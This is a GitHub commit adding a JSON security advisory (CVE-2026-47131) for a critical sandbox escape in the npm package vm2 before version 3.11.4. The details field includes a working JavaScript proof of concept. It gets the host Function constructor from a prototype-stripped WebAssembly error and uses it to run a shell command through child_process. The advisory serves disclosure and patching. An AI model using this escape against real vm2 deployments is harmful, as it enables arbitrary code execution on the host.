Skip to content

Commit 89eefd0

Browse files
1 parent 6f8c640 commit 89eefd0

1 file changed

Lines changed: 68 additions & 0 deletions

File tree

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-v6mx-mf47-r5wg",
4+
"modified": "2026-05-29T17:33:58Z",
5+
"published": "2026-05-29T17:33:58Z",
6+
"aliases": [
7+
"CVE-2026-47131"
8+
],
9+
"summary": "vm2 has a Sandbox Escape issue",
10+
"details": "### Summary\nBy combining `Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\")`, `Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox.\nThis allows attackers to run arbitrary code.\n\n### PoC\n```js\n\"use strict\";\n\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\nvm.run(`\n \"use strict\";\n\n const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\");\n const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\");\n\n async function f() {\n try {\n await WebAssembly.compileStreaming();\n } catch(e) {\n setProto.call(getProto.call(e), null);\n }\n\n try {\n await WebAssembly.compileStreaming();\n } catch(e) {\n const HostFunction = e.constructor.constructor;\n new HostFunction(\"return process\")().mainModule.require(\"child_process\").execSync(\"echo pwned\", { stdio: \"inherit\" });\n }\n }\n\n f();\n`);\n```\n\n### Impact\nSandbox Escape → RCE",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "vm2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "3.11.4"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 3.11.3"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/patriksimek/vm2"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-913"
62+
],
63+
"severity": "CRITICAL",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-05-29T17:33:58Z",
66+
"nvd_published_at": null
67+
}
68+
}

0 commit comments

Comments
 (0)